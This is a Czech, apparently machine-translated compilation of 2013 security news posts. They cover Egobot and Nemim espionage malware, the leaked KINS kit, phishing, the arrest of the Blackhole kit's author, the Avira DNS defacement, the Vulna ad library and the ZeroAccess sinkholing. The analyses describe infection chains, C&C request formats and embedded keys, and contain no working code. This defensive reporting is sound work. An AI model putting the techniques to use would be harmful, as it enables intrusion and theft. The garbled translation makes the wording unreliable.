NQ Mobile identifikovala, "Poznej App", nový fraudware virové hrozby zaměření Android uživatelé v Číně a některé země v jihovýchodní Asii. "Poznej App", identifikován jako a.frau.longjian.a, zdá Android uživatelům aktualizaci k extrémně populární NetDragon 91 Assistant app. Pokud se uživatel rozhodne pro aktualizaci této podvodné aplikace, automaticky se stáhne další přebalených aplikace na pozadí, které spotřebovávají data uživatele. Hlavní hanebné chování těchto přeměněných aplikací jsou:
Přihlásit se k odběru poplatků založených služeb prostřednictvím SMS bez vědomí uživatele, což má za následek nechtěné vyúčtování poplatků Přístup a sbírat různé informace o zařízení uživatele, jako například informace o telefonu (např. telefonní číslo, IMEI, IMSI) a uživatelská aplikace, napadající soukromí uživatele. V době, kdy identifikace a očkování, se počet infekcí byly identifikovány jako 193 uživatelů v kombinaci pevninské Číny, Angola, Hong Kongu, Iráku, Macao, Malajsie, Singapuru, Tchaj-wanu a Vietnamu.
Backdoor.Egobot: Jak efektivně provést cílenou kampaň 15.10.2013 Viry
Backdoor.Egobot je Trojan používané v kampaních cílených na korejské zájmy. Provedení kampaně je jednoduchá a efektivní. Symantec údaje naznačují, že kampaně je v provozu od roku 2009. Egobot se postupně vyvíjely přidáním novější funkce. Útočníci používají čtyři zlatých pravidel cílené kampaně:
Identifikace cílů Exploit cíle (aby pokles užitečného zatížení) Proveďte škodlivou činnost (v takovém případě, krást informace) Zůstanou neodhaleny Také jsme odhalili paralelní kampaň, která byla v provozu již v roce 2006, které se bude vztahovat na jiný blog .
Egobot cíle
Egobot je zaměřen na pracovníky pracující pro korejské společnosti, a také na pracovníky, kteří podnikají s Koreou. Industries zaměřené na Egobot patří:
Finance a investice Infrastruktura a rozvoj Vládní agentury Armádní dodavatelé Cíle jsou umístěny po celém světě a patří Korea, Austrálie, Rusko, Brazílie a Spojené státy.
Cílem kampaně je Egobot krást důvěrné informace z napadených počítačů.
Vykořisťování
Útočníci shromažďovat informace o svých cílů s využitím techniky sociálního inženýrství před láká je do pasti. Cíle jsou poslala oštěp phishing e-mail, často předstírá, že být poslán od osoby, které již znají. Oštěp phishing e-mail obsahuje relevantní nebo lákavé zprávu do cíle, což je nutí k otevření nebezpečného přílohu. Škodlivý příloha může být zkratka. Lnk soubor, který odkazuje na soubor umístěn na GeoCities Japonsko.
Různé škodlivé přílohy byly použity v této kampani:
LNK soubory.: Viděli jsme tuto taktiku použít, aniž by však tyto útočníci také použít Microsoft HTML Application (Mshta) ke stažení jiného souboru do systému. Doc. Soubory: Využívá následující chyby: Microsoft Office RTF souboru Stack Přetečení vyrovnávací paměti (CVE-2010-3333) Adobe Flash Player "FSM" Soubor Remote Chyba zabezpečení poškození paměti (CVE-2011-0609) NsP. Soubory: Obsahuje skript, který stáhne škodlivý soubor Při otevření přílohy se spustí následující třístupňový proces stahování:
Krok 1: Stáhněte si popletl HTML soubor
Každá z příloh ke stažení malware z webů hostovaných na geocities Japonsku. Soubory se liší, ale obvykle s názvem Aktualizace RRRRMM []. Xml, který je popletl HTML soubor, který klesá spustitelný v systému.
Krok 2: Stáhněte RAR archiv
Klesl spustitelný z 1. etapy načítá jiný soubor z GeoCities Japonsko. Tento soubor je oprava hotfix [RRRRMM]. Xml, který je spustitelný soubor RAR. Oba stažené soubory v prvních dvou fázích se tváří jako dokumenty XML ve snaze projít jako čistý soubor.
Fáze 3: Stáhnout zadní dveře složka
Spustitelný soubor RAR je odpovědný za přípravu systému. Padne sadu souborů, které jsou odpovědné za přesouvání souborů kolem, vstřikování komponenty do procesů, a krást následující informace o systému:
Verze pro Windows Instalovaná verze aktualizace service pack Instalace jazyka Uživatelské jméno
Ukradené informace jsou odeslány do Egobot je velení a řízení (C & C) serveru v následujícím formátu:
/ Micro / advice.php? Arg1 = 1irst & arg2 = [base64 řetězec] / Micro / advice.php? Arg1 = 1irst & arg2 = [HASH] & arg3 = [base64 řetězec] Data, která je odeslána zpět do C & C je šifrována pomocí rotujícího klíč vložený uvnitř malware. Sledovali jsme následující dva konkrétní klíče:
youareveryverygoodthing allmyshitisveryverymuch Konečně, spustitelné rar soubor ke stažení jeden z Poslední složkou GeoCities Japonsko. Tento stažený soubor je pojmenován pomocí hodnoty arg1 v GET příkazu zaslaného C & C. V tomto případě Egobot pokusí stáhnout soubor s názvem 1irst.tmp, což je hlavní náklad.
Krádež informací
Hlavní náklad má specifické funkce, které jsou potenciálně katastrofální pro cílené obchodní vedení. Tyto funkce zahrnují:
Nahrávání videa Nahrávání zvuku Snímání screenshotů Nahrávání souborů na vzdáleném serveru Získání nejnovější seznam dokumentů Hledání řetězec nebo vzor v souboru Mazání a nastavování body obnovení Ukradené informace jsou odeslány na vzdálené servery hostované v Malajsii, Hongkongu a Kanadě. Útočníci také aktualizovala své kód patří 64-bitové verze, aby hladce přes 64-bitové platformy.
Zůstat pod radarem
Egobot jsou přenesena do systému jako svázaný RAR archiv s různými komponenty balených používat komerční Packers exe32pack a UPX. Tyto lze použít následující součásti k zamaskování přítomnosti škodlivého softwaru:
Detoured složka: Backdoor.Egobot je sestaven s použitím starší verze Microsoft objížděk funkčnost softwarového balíku, který zahrnuje Detoured.dll souboru. Tento soubor se používá k upevnění škodlivé. Dll soubory legitimní Win32 binaries. Egobot Tento soubor můžete použít ke spuštění se v paměti legitimního procesu, maskující se jako čistý proces. Koordinátor komponenty: Připravuje souborů jejich přesunutím do příslušných složek a vstřikování je do legitimních procesů. Backdoor.Egobot se obvykle aplikuje do explorer.exe, subst.exe a alg.exe procesů. Timer funkce: Některé verze zadní dveře složky patří časovač funkce, takže můžete odstranit Trojan se po určitém datu. Tato funkce odstraní všechny stopy Backdoor.Egobot.
Zákazníci Symantec jsou chráněny Symantec Email Security.cloud . Škodlivé vzorky z této kampaně jsou detekovány jako trojského koně , Trojan.dropper , Trojan.Mdropper a Backdoor.Egobot .
A, bohužel, tam je více k tomuto příběhu. Prostřednictvím našeho výzkumu Egobot společnost Symantec identifikovala paralelní provoz související s Egobot, která působí od roku 2006, o tři roky před Egobot. Další podrobnosti o Nemim kampaně včetně jeho vztahu k Egobot kampaně jsou vysvětleny v samostatném blogu, Infostealer.Nemim: Jak Všudypřítomná Infostealer se stále vyvíjí
Infostealer.Nemim: Jak Všudypřítomná Infostealer dále vyvíjet 15.10.2013 Viry | Hacking
Dříve jsme blozích Backdoor.Egobot a nastínil, jak se zaměřuje na konkrétní odvětví a současně udržuje nízký profil. Mezi zločinci za sebou Egobot také vyvinuli Infostealer.Nemim pro rozšíření a převládající kampaně. I přes rozdíly v rozsahu, jak hrozby krást informace z napadených počítačů, a existují náznaky, tyto dvě hrozby pocházejí ze stejného zdroje.
Nemim komponenty
Symantec zjistil Nemim ve volné přírodě již na podzim roku 2006. Jeden z prvních vzorků obsahovalo časovače mechanismus pro určení, kdy se odstranit z napadeného počítače. Odstranění bylo podmíněno a vázáno na pevné datum, nebo na základě počtu případů, kdy byl vzorek provést. Časovač mechanismus funkce byla také nalezena ve vzorcích Egobot.
V Nemim vzorky jsme analyzovali byly digitálně podepsány s ukradenými certifikáty a po čase byl malware aktualizován tří složek:
Infektor složka Downloader složka Informace zloděj složka
Infektor složka
Infector komponenta je navržena tak, aby infikovat spustitelné soubory v určitých složkách. Zejména se zaměřuje na infector% USERPROFILE% složku a všechny její podsložky.
Infekce není propracovanější. Nemim zkopíruje do nové části s názvem. Rdat kdy ve spodní části infikovaného souboru. Původní vstupní bod z infikovaného souboru se mění, aby se poukázat na Nemim kódu v. Rdat části. Infekce kód je zodpovědný za dešifrování klesá a běží vložený spustitelný soubor v následující cestě:
AllUsersProfile%% \ Application Data \ Microsoft \ Display \ igfxext.exe Tento soubor je vykonán součást downloader.
Downloader složka
Komponenta Downloader slouží jako obálka pro šifrovaný spustitelný soubor. Po dešifrování je šifrovaný spustitelný soubor načten dynamicky. Tento šifrovaný spustitelný soubor obsahuje aktuální downloader funkčnost. Nicméně, před stažením, malware sklizně následující informace o systému z napadeného počítače:
Název počítače Uživatelské jméno CPU jméno Operační systém verze Počet zařízení USB Místní adresa IP MAC adresa
Tento sklizené informace šifrována, konvertoval k Base64, a poslal na velení a řízení (C & C) serveru, stejně jako Egobot. Sklizené informace zobrazitelné na C & C serveru v nešifrované podobě. Například proměnná P2Pdetou zobrazí název počítače a uživatelské jméno: [Název počítače] @ [jméno uživatele]. Server pak odpoví základních příkazů, včetně užitečného zatížení, který je přetažen a popraven. Downloader pak očekává, že server odpoví "minmei" string doprovodu z následujících příkazů:
nahoru re ne Do příkazu, například vyplývá, že se stažená data obsahuje spustitelný náklad, který Downloader dešifrovat a běh.
Informace zloděj složka
Informace zloděj komponenty mohou krást uložená pověření účtu z následujících aplikací:
Internet Explorer Mozilla Firefox Google Chrome Microsoft Outlook Outlook Express Windows Mail Windows Live Mail Gmail Notifier Google Desktop Google Talk MSN Messenger Informace zloděj ukradl pošle data zpět do C & C serveru a stejně jako downloader, očekává "minmei" řetězec v odpovědi.
Zeměpisné rozložení a ochrana
Japonsko a Spojené státy jsou hlavní cíle Nemim, následované Indií a Spojeným královstvím.
Symantec detekuje všechny komponenty těchto hrozeb pro ochranu zákazníků před útoky:
Analýza Nemim binární ukázal připojení k Backdoor.Egobot z několika podobnosti u obou hrozeb.
Nemim
Egobot
Informace shromážděné v určitých formátech pomocí specifické značky
Sys @ Uživatel:% s @% s (% s) CPU:% s Systém OS:% s (% s) Čistá karta:% s (% s)
Sys @ Uživatel:% s @% s (% s) CPU:% s Systém OS:% s (% s) Čistá karta:% s (% s)
Informace o šifrování
Šifrované a base64
Šifrované a base64
C & C komunikační formát
[URL / IP] / [cesta] / [SOUBOR]. Php? A1 = % s & a2 =% s & a3 =% s
[URL / IP] / [cesta] / [SOUBOR]. Php? Arg1 = % s & arg2 =% s & arg3 =% s
Kód injekční technika
Microsoft objížďky funkce (první verze)
Microsoft objížďky funkčnost (všechny verze)
Na základě těchto podobností a překrývající se časové osy obou kampaní, že je zřejmé, že Nemim a Egobot pocházejí ze stejného zdroje.
Potenciál pro nové kampaně
Nemim funguje i dnes a účinně se v průběhu času. Například řetězec šifrování se stal non-triviální, že ukradené digitální certifikáty byly modernizovány s novějšími, a tam jsou nyní kontroly na místě pro detekci běžných virtuálních strojů. Opravdu, za posledních sedm let útočníci ukázaly neochvějné odhodlání k inovacím a vyvinuli malware, který je adaptabilní, aby vyhovovaly potřebám dvou různých útočných kampaní. Očekáváme, že tento trend bude pokračovat inovovat s vysokým potenciálem pro nové kampaně.
Yara pravidla pro unikly Kins nástrojů 14.10.2013 Viry | Kriminalita Jen před pár dny, zdrojový kód slavného Kins byl Trojan bankovnictví unikly. Kins cílem infikovat co nejvíce počítačů, jak je to možné, aby se ukrást přihlašovací údaje kreditní karty, bankovní účet a související informace z obětí. Při pohledu jako náhrada Citadel , bylo zjištěno ve volné přírodě není to tak dávno. Nyní, může to vést k úniku nových variant malware a rodiny. V této výbavy najdeme všechny zdrojové kódy a zkompilované verze jednotlivých komponent, stejně jako webový panel pro správu botnet. XyliBox udělal dobrý rozbor balíčku . Po studiu součásti, jsme psali dva Yara pravidla tak, aby odpovídala kapátko a verze zeus použita jako bota. Yara je nástroj, jehož cílem je pomoci malware výzkumní pracovníci identifikovat a klasifikovat vzorků malwaru. můžete najít a volně používat v našem GitHub repozitáři. Autor: Alberto Ortega, výzkumný pracovník na AlienVault.
Symantec vědci nedávno narazil na phishing, který skrývá dvojí pohroma: místo požádá uživatele buď přihlásit do Facebooku nebo stáhnout aplikaci, aby došlo k aktivaci fiktivní službu, která bude pravděpodobně dejte jim vědět, kdo navštívil svůj profil na Facebooku (tlačítko Na obrázku pro jeho zvětšení): Pro ty, kteří se rozhodnou pro první možnost a zadejte své přihlašovací údaje Facebook zpráva je špatná: své uživatelské jméno a heslo bylo zasláno na phisherů a bude pravděpodobně použita pro únos účtu oběti. Pro ty, kdo si vybral druhou možnost by zpravodajství mohlo být ještě hůř. Soubor ( WhoViewedMyfacebookProfile.rar ) nabízíme ke stažení obsahuje informace-krást Trojan, který může potenciálně shromažďovat všechny druhy důvěrných informací z počítače oběti a pachatele - včetně osobních, finančních a přihlašovací údaje pro různé on-line služeb - a je nastaven na odeslat tak na útočníkův e-mailovou adresu. Avšak, jak výzkumníci zjistili, že e-mailová adresa nebyla platná 3 měsíce, takže informace je poslán a ztratil na virtuální černé díry internetu. Přesto může malware dostat aktualizovány kdykoli a e-mailová adresa v otázce změněn na platný jeden. "Pokud uživatelé padl za oběť phishing zadáním své přihlašovací údaje, by phishingu úspěšně ukradl své informace za účelem krádeže identity , " vědomí vědci. K phishingu pověření, pak je samozřejmě poslal na servery ovládaných útočníků, a to na výše uvedený e-mailovou adresu. Ale ať už to phishing podvod je stil aktivní nebo ne není místo, protože jiné podobné ty se objevují každý den. Dobrá věc k zapamatování je, dávat pozor na to, kde zadáváte vaše bankovní údaje (vždy zkontrolujte, zda je adresa URL je správná, a nemusí sledovat odkazy z nevyžádaných e-mailů) a jaký software stáhnout (nepřijmete software, nepožádali o, a buďte opatrní při hledání software on-line - držet se stanovených místech ke stažení).
Blackhole Exploit Kit Autor zatčen v Rusku 9.10.2013 Viry | Hacking | Bezpečnost | Kriminalita
Out-of-the-blue tweet z nizozemského výzkumníka odstartovala nebývalý 24hodinovou melou mlýny včera o zatčení břicho, hacker údajně za notoricky známý Kit Blackhole Exploit. Zatčení, nakonec dnes potvrdil vedoucí Evropského střediska počítačové kriminalitě (EC3), je pravděpodobné, aby díru do temného podsvětí počítačové trestné činnosti.
Blackhole je nejvíce známý malware kit k dispozici na darknet, souprava je v pronájmu zločinců, kteří používají mnoho zranitelná místa v prohlížeči k dispozici v sadě nakazit uživatele. Zločinci používají škodlivé odkazy vést uživatele k napadených míst a exploit kit pak určí, které využije bude pracovat na oběti počítači a použít je ohrožen stroj.
Troels Oerting, který provozuje EC3 z Haagu v Nizozemsku, potvrdil na TechWeek Evropy, Paunch byl ve vazbě.
"Vím, že je to pravda, máme nějaké informace, ale nemohu říci, už ne," Oerting je citován a dodal, že nemohl sdílet další podrobnosti.
bachor zatčení
Pověst mlýn odstartovala po pípání z Fox-IT bezpečnostní výzkumník Maarten Boone oznámil břicho zatčení v Rusku. Krátce poté, francouzský bezpečnostní výzkumník Kafeine řekl Threatpost prostřednictvím e-mailu, že souprava je Java archivy nebyly aktualizovány téměř čtyři dny, údaj se něco chystá. On poskytoval Threatpost s grafickým výše, který ukazuje celou řadu Blackhole míst vracejí brány chyby nebo jar soubory, které byly ignorovány dnů; Blackhole JAR soubory jsou aktualizovány někdy dvakrát denně.
Kafeine také řekl, že rozdělení malware Reveton Ransomware se přestěhovala z Blackhole Exploit WhiteHole do soupravy. [.] Navíc, krypta am, on-line služby údajně provozují břicho bylo včera nedostupný, služba se používá k zašifrování části exploit kit.
Aleks Gostev, hlavní bezpečnostní expert společnosti Kaspersky Lab Global Research & Analysis Team, potvrzuje i prostřednictvím anonymních zdrojů, že zatčení bylo vyrobeno.
"Tři scénáře [nyní] proveditelná: Blackhole mohou zmizet, být převzaty jinými vývojáři, nebo nahrazeny jinými exploit kity," řekl Gostev. "Co se kombinace těchto scénářů se stane, uvidíme."
V lednu Cool Exploit Kit vynořil on-line, a to i údajně postavena a udržována břichem. Chladná, ale je mnohem dražší, než jeho starší bratr, okouzlující blízko k $ 10,000 v měsíčních leasingových poplatků ve srovnání s 500 dolarů měsíčně za Blackhole.
V té době, Cool využila několika prohlížeči nulovou dny, které byly určeny k drženy v tajnosti, zatímco Blackhole, hostovaná služba, je balíček známých exploitů cílení záplaty chyby, obecně přesměruje prohlížeč, který vynutit oběti prohlížeč útok stránky, kde více malware čeká. Nedávno Blackhole odklonily od výhradně nabízí prohlížeč-založené chyby, a začala skládáním využije pro Java, Adobe Reader a Flash.
V roce 2011, zdrojový kód pro Blackhole unikly online, což jen posloužil, že dělá krajiny pro ohrožené organizací, které se mnohem chlupatější. Ale to nebolelo podnikání na břicho a jeho gangem, údajný tvůrce Blackhole, který znovu investovala více než 100.000 dolarů v prohlížeči a prohlížeč plug-in zranitelnosti, podle příspěvku na podzemní fóru hlášené Krebs pro bezpečnost v lednu tohoto roku.
Anti-Virus společnosti Avira Úvodní počmáraný
8.10.2013 Viry
Od Avira
"Zdá se, že na náš účet se používá ke správě DNS záznamů zapsána u Network Solutions získal falešný hesla žádost o obnovení, který byl poctěn poskytovatelem. Použití nových přihlašovacích údajů se zločinci byli schopni změnit položky upozornit své DNS servery . " -----------
Domovská stránka antivirový společnosti Avira bylo poškozeno, pravděpodobně změnou zóny DNS pro Avira.com. V současné době, avira.com používá následující záznamy NS:
$ Dig + krátký avira.com NS ns2.radioum.com.br. n1.ezmail.com.br. ns1.radioum.com.br. n2.ezmail.com.br. $ Dig + krátký avira.com 173.193.136.42 Jakmile útočník získá kontrolu nad NS záznamů, mohou také změnit MX záznamy a přesměrování e-mailu, nebo v případě společnosti Avira Antivirus, jako je změna adresy používané pro stažení aktualizace signatur.
Podle domaintools.com, poslední adresa pro avira.com byl 62.146.210.2 a adresa se zobrazí stále hostit Avira svého webu.
Whois záznam z mezipaměti před pár dny uvádí tyto DNS servery pro avira.com:
NS1.AVIRA-NS.NET NS2.AVIRA-NS.DE 195.34.161.132 NS3.AVIRA-NS.NET NS4.AVIRA-NS.DE 212.7.178.67 Doména je hostována u Network Solutions. V tuto chvíli to vypadá jako ojedinělý případ a ne více širokého problém s Network Solutions.
Doufám, že to nebude považovat za "moderní sofistikovaný vysoce kvalifikovaných útok", protože útočníci mají problémy pravopis "Palestinu" důsledně. Obsah stránek znetvořil je politický a žádný malware byl spatřen na místě tak daleko.
Částečné screenshot webu:
Náš čtenář Stuart nám poslal screenshot s podobným znetvoření Antivirus prodejce AVG (avg.com), ale místo se zdá být zpátky do normálu. Nemůžu říct, jestli to bylo znetvoření DNS související nebo ne. Instant messaging software výrobce WhatsApp byl appearently třetiny obětí tohoto útoku.
Zranitelné a agresivní adware ohrožuje miliony 7.10.2013 Zranitelnosti | Viry
FireEye objevil nový mobilní hrozby z populární reklamní knihovny, že žádný jiný antivirový nebo dodavatelem zabezpečení, který byl veřejně oznámen dříve. Mobilní reklamní knihovny třetí strany, včetně softwaru hostitelské aplikace za účelem zobrazování reklam. Protože tato knihovna je funkčnost a zranitelnosti mohou být použity k provedení rozsáhlých útoků na miliony uživatelů, máme na mysli to anonymně krycím názvem "Vulna" spíše než odhalil svou identitu. Analyzovali jsme všechny Android aplikace na více než jeden milion stažení na Google Play, a zjistili jsme, že více než 1,8% z těchto aplikací používá Vulna. Tyto postižených aplikace byly staženy více než 200 milionů krát v celkem. Ačkoli to je všeobecně známo, že reklamní knihovny představují rizika pro soukromí, jako je shromažďování identifikátory zařízení (IMEI, IMSI, atd.) a informace o poloze, Vulna představuje daleko závažnější problémy se zabezpečením. Za prvé, Vulna je agresivní, pokud instruován svým serverem, bude shromažďovat citlivé informace, například textové zprávy, telefonní hovor, historie a kontakty. Provádí také nebezpečné operace, jako je provedení dynamicky stažený kódu. Za druhé, Vulna obsahuje řadu různých chyb. Tyto chyby zabezpečení při využívány útočníkovi dovolit využít Vulna je riskantní a agresivní funkce provádět nebezpečné činnosti, jako je zapnutí fotoaparátu a fotografování bez vědomí uživatele, krást dvoufaktorová autentizace tokeny odeslané přes SMS, nebo otočením zařízení do části . botnet . Jsme mince termín "vulnaggressive" k popisu této skupiny zranitelných a agresivní vlastnosti Následuje ukázka z agresivní chování a zranitelnosti jsme objevili v Vulna. Agresivní chování:
Kromě sběru informací používané pro cílení a sledování, jako jsou identifikátory zařízení a umístění, jak mnoho reklamních knihovny dělat, Vulna také shromažďuje k zařízení majitele e-mailovou adresu a seznam aplikací nainstalovaných v zařízení. Dále Vulna má schopnost číst textové zprávy, telefonní hovor historii a seznam kontaktů, a sdílet tato data veřejně bez jakékoliv kontroly přístupu přes webové služby, která začíná na zařízení. Vulna stáhne libovolný kód a spustit jej, pokud pokyn vzdáleného serveru. Chyby: Vulna přenese uživatele soukromých informací prostřednictvím protokolu HTTP ve formátu prostého textu, které je náchylné k odposlechu útoky. Vulna také používá nezabezpečený protokol HTTP pro příjem příkazů a dynamicky namáhané kód z jejího kontrolního serveru. Útočník může převést Vulna do botnetu při napadání jeho provoz HTTP a slouží škodlivé příkazy a kód. Vulna používá Androidu Webview s JavaScript k Java vázání v nezabezpečeném způsobem. Útočník může tuto chybu zabezpečení zneužít a slouží škodlivý kód JavaScriptu provádět škodlivé činnosti na zařízení. Tato chyba zabezpečení je instance společného JavaScript závazné zranitelnosti, která byla podle odhadu ovlivnit více než 90% zařízení se systémem Android. Vulna je agresivní chování a zranitelnosti vystavit Android uživatele, zejména podnikovým uživatelům, k vážným bezpečnostním hrozbám. Využitím Vulna je vulnaggressive chování, mohl by útočník stáhnout a spustit libovolný kód na zařízení uživatele v rámci hostitelské aplikace Vulna je. Z naší studie, mnoho hostitelské aplikace obsahující Vulna mají silné oprávnění, které umožňují ovládání kamery, čtení a / nebo zápis SMS zpráv, telefonního hovoru historie, kontakty, historie a záložek prohlížeče a vytvoření ikony na domovské obrazovce. Útočník by mohl využít tyto obecné oprávnění k provedení škodlivé akce. Můžete například útočníci: krást dvoufaktorové autentizační token zaslané prostřednictvím SMS prohlížet fotografie a další soubory na SD kartě instalaci ikony, které v oblasti phishingových útoků na domovské obrazovce odstranit soubory a zničit data na vyžádání vydávat majitele a posílat textové zprávy padělaných k obchodním partnerům vymazat příchozí textové zprávy bez uživatelova předchozího upozornění hovory místo telefonu používat fotoaparát fotit bez předchozího upozornění uživatele číst záložky nebo změnit upozornit na podvodné stránky. Existuje mnoho možných způsobů Útočník by mohl zneužít Vulna zranitelná místa. Jedním z příkladů je veřejné Wi-Fi únosu: Když oběti připojení zařízení k veřejné Wi-Fi hotspot (například v kavárně nebo na letišti), útočník poblíž mohl odposlouchávat provoz Vulna je a aplikovat škodlivé příkazy a kód. Útočníci mohou také provádět DNS únos k útoku uživatelů po celém světě, jak v syrském elektronických nedávných útoků armády zaměřených na Twitter, The New York Times a Huffington Post. V DNS únos útoku, útočník by mohl změnit záznamy DNS serverů reklamních Vulna je přesměrovat návštěvníky na své regulační serveru, za účelem získání informací z nebo poslat škodlivé příkazy Vulna na oběti zařízení. Navzdory vážným hrozbám, které představuje, Vulna je nenápadný a těžko odhalit:
Vulna přijímá povely od svého reklamního serveru pomocí data zakódovaná v polích záhlaví HTTP místo v těle HTTP odpovědi. Vulna zatemňuje její kód, který dělá tradiční analýza obtížné. Vulna je chování může být obtížné spustit pomocí tradiční metody analýzy. Například, v jedné oblíbené hry, je Vulna provedena pouze v určitých místech ve hře, například při dosažení určité úrovně, jak je znázorněno na obrázku níže. (Údaj byl částečně rozmazané skrýt identitu app.) Při spuštění Vulna, jediný efekt viditelný pro uživatele je reklama v horní části obrazovky. Nicméně, Vulna tiše vykoná své rizikové chování v pozadí. FireEye Mobile Threat Prevention uplatňuje jedinečný přístup a technologii, která umožnila odhalit bezpečnostní problémy popsané v tomto příspěvku, rychle a přesně přes tyto výzvy. Poskytli jsme informace o zjištěných bezpečnostních problémů, seznam zatížených aplikací a náměty jak Google a prodejce Vulna. Potvrdili problémy a jsou aktivně ji řešit. Závěrem jsme objevili nový mobilní hrozby z populární reklamní knihovny (s kódovým označením "Vulna" o anonymitu). Tato knihovna je součástí populárních aplikací na Google Play, které mají více než 200 milionů stažení celkem. Vulna je instancí rychle rostoucí třídě mobilní hrozby, které jsme nazval vulnaggressive ad knihovny. Vulnaggressive reklamní knihovny jsou znepokojivě agresivní na shromažďování citlivých údajů uživatelů a vkládání schopnosti vykonat nebezpečné operace na požádání, a také obsahují různé třídy chyb, které umožňují útočníkům využít jejich agresivní chování k harm uživatelům. App vývojáři pomocí těchto knihoven třetích stran často nejsou vědomi bezpečnostních otázkách v nich. Tyto hrozby jsou zvláště závažná pro podnikové zákazníky. Navíc, tento vulnaggressive charakteristika není omezen jen na reklamních knihoven, se vztahuje také na jiných výrobců komponent a aplikací. Autoři: Tao Wei, Dawn Song, Yulong Zhang Hui a Xue z FireEye.
Spammeři pomocí Keňa teroristického útoku šířit malware 7.10.2013 Spam | Viry
Spammeři jsou nyní využití novinek kolem útoku teroristickou Keni zaměřením uživatelům prostřednictvím e-mailové zprávy, které tvrdí, že obsahují zprávy o útoku, ale ve skutečnosti obsahuje malware. Nevyžádaných e-mailů obsahuje nebezpečný URL v těle zprávy, která přesměruje uživatele na ohrožení webovou stránku, která ke stažení W32.Extrat .
Při spuštění malware může vytvořit následující soubor:
% Windir% \ \ installdir Server.exe To umožňuje, aby útočník ukrást hesla a získat přístup k citlivým souborů a informací, které patří uživateli.
Obrázek. Screenshot z nevyžádaných e-mailů s dotazem uživatele ke stažení. exe soubor
Napsat zobrazí zprávu "Klikněte zde pro zobrazení a dívat se na" videa a obrázky na teroristický útok na Westgate Mall. Kliknutím na odkaz se otevírá ohrožena webové stránky. Po načtení webové stránky se uživateli zobrazí okno žádat je, aby soubor stáhnout "Kenya teroristické Video.exe." Tento spustitelný binární soubor je obecný forma malware s názvem W32.extrat, že pokud stáhli, by mohl zneužít zranitelná místa na v počítači uživatele. Spammeři používají příslib videa a obrázky jako pasti nalákat velký počet uživatelů, kteří hledají informace o teroristický útok.
Spam e-mailové zprávy mohou mít následující předmět:
Úředník: Keňa centrum útočníci Video Níže je ukázka záludnou URL obsažené v nevyžádaných e-mailů:
http:// [odstraněno]. [odstraněno] .com/u/210772057/Kenya teror video.rar Aplikace Symantec Endpoint Protection technologie umožňuje preventivní detekci a identifikaci tohoto druhu škodlivé stránky, a to iv případech, kdy místo dosud hlášeny Symantec jako škodlivý. Symantec chrání zákazníky před tímto typem útoku s výrobky, které obsahují antivirové a antispamové technologie, jako je Norton AntiVirus a Norton Internet Security .
Malware v tomto útoku je detekován jako Symantec W32.Extrat .
Uživatelům se doporučuje dodržovat následující osvědčené postupy, aby se předešlo nebezpečné útoky:
Neotevírejte přílohy ani neklikejte na odkazy v podezřelých e-mailových zpráv. Vyhněte se poskytovat žádné osobní údaje při přijetí e-mailu. Nikdy zadání osobních údajů v pop-up stránky nebo obrazovky. Udržujte bezpečnostní software up-to-date.
Nová hrozba: Sinkholing ZeroAccess - Service Alert 7.10.2013 Viry | Kriminalita
V pondělí 30.září 2013, byl článek zveřejněn na blogu Symantec Security Response společnosti Symantec podrobně úsilí na sinkholing 500000 z botů, které patří do ZeroAccess botnet. Jak srpna 2013 botnet je jedním z největších v existenci dnes s populací v nahoru o 1,9 milionu počítačů. ZeroAccess používá peer-to-peer (P2P) jako jeho velení a řízení (C & C) komunikační mechanismus.
V březnu tohoto roku, Symantec bezpečnostních inženýrů začal studovat mechanismy používané ZeroAccess roboty komunikovat spolu navzájem ve snaze zjistit, zda by mohly být sinkholed. 29. června, pozorovali novou verzi ZeroAccess je distribuován přes P2P sítě. Aktualizovaná verze se zabývala konstrukční chybu, která dělala botnet ohroženy jsou sinkholed. Nicméně, Symantec byl ještě úspěšný v sinkholing velkou část botnetu.
16. července Symantec začal sinkholing ZeroAccess infekcí. Tato operace se rychle vyústila v odtržení více než půl milionu roboty, což výrazně snižuje počet botů ovládaných bot pána.
HROZEB ÚDAJE:
ZeroAccess botnet byl původně objeven na nebo kolem 13.července 2011. ZeroAccess je trojský kůň, který využívá pokročilé rootkit ukrýt. ZeroAccess můžete také vytvořit skrytý souborový systém, stáhněte si další malware, a otevřít zadní vrátka na ohrožena počítače.
Botnet ZeroAccess je navržen pro náklad do infikovaných počítačů. Stažené užitečná zatížení jsou primárně využívány pro účely příjmů generace (Bitcoin Těžba a Click Fraud).
Klikněte Podvod Jeden typ užitečného zatížení jsme viděli, je klikání Trojan. Trojan stáhne on-line reklamy do počítače a pak generuje umělé kliknutí na reklamy, jako by byly generovány oprávněné uživatele. Tito falešní kliknutí počítat pro vyplácení náhrad v pay-per-click (PPC), affiliate programy.
Bitcoin Těžba Virtuální měna má řadu atrakcí pro zločinci. Způsob, jakým každý Bitcoin vstoupí do existence je založena na provádění matematických operací známých jako "dobývání" na počítačového hardwaru. Tato činnost má přímý hodnotu do bot master a náklady na nic netušící oběti (zvýšil účet za elektřinu).
Hrozba je distribuován několika způsoby, pomocí drive-by-download je nejčastější způsob útoku. Ohrožena webové stránky mohou přesměrovat uživatele na škodlivé webové stránky určené k využití nic netušící uživatele a nainstalovat ZeroAccess. Uživatel může také kliknout na přílohu v e-mailu phishing, což vede ZeroAccess instalován na pozadí bez vědomí uživatele.
SOC detekčních schopností
Pro zákazníky s členskými státy IDS / IPS bezpečnostních služeb řízení, bude prodejce bázi podpisy se automaticky rozmístěny, jak na prodávajícího doporučení. Pokud máte zájem o další informace týkající se podpisových státy na svých zařízeních, nebo chcete-li požádat o aktivaci konkrétního podpisu, kontaktujte support@monitoredsecurity.com .
Pro zákazníky s monitory pouze IDS / IPS zařízení Symantec MSS nadále poskytuje bezpečnostní monitoring na tuto hrozbu.
KOMPONENTY a detekce
ZeroAccess - MSS detekce: [MSS URL Detection] Trojan.ZeroAccess CnC provozu
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (53/UDP)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (na portu 123) (2)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (na portu 53/123)
Hot IP - Trojan.ZeroAccess P2P botnet Node (1)
Hot IP - Trojan.ZeroAccess P2P botnet Uzel (2)
Hot IP - ZeroAccess CnC provozu
Hot IP - ZeroAccess CnC provozu (přes 123/UDP)
Hot IP - ZeroAccess CnC provozu (přes 53/UDP)
Hot IP - ZeroAccess Sinkhole činnost
ZeroAccess - Vendor detekce: Detekce od následujících dodavatelů byla pozorována MSS:
FireEye
Fortinet
IntruShield
McAfee AV
McAfee Endpoint Protection
NetScreen IDP
